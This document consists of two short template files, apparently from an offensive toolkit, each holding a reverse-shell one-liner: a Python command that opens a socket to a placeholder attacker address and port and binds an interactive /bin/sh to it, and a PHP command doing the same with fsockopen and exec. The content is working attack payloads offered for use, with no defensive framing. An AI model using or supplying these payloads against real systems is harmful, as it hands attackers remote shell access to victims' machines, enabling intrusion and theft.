File: templates/simple_shell.py
# simple python shell | Author: r00t-3xp10it
# credits: https://highon.coffee/blog/reverse-shell-cheat-sheet/
# ---
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IpAdDr",P0rT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

File: templates/simple_shell.php
/*
* simple php shell | Author: r00t-3xp10it
* credits: https://highon.coffee/blog/reverse-shell-cheat-sheet/
*/
php -r '$sock=fsockopen("IpAdDr",P0rT);exec("/bin/sh -i <&3 >&3 2>&3");'
